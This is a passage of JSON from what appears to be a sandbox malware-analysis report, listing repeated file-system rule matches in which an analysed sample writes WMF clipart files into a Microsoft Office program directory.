"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107152.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35090", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107152.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35099", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107154.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35108", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107182.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35117", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107182.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107188.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35124", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107188.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107192.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35131", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107192.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107254.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35138", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107254.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107258.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35147", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107258.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107262.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35154", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107262.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35161", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107266.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35168", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107266.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107280.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35175", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107280.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35182", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35189", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35196", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35203", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35210", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35217", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35224", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35231", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35238", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107342.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35245", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107342.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35252", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35259", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35268", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107364.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35275", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107364.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35284", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107446.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35291", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107446.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35300", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35307", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35316", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107458.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_35323", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107458.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107468.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107468.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { 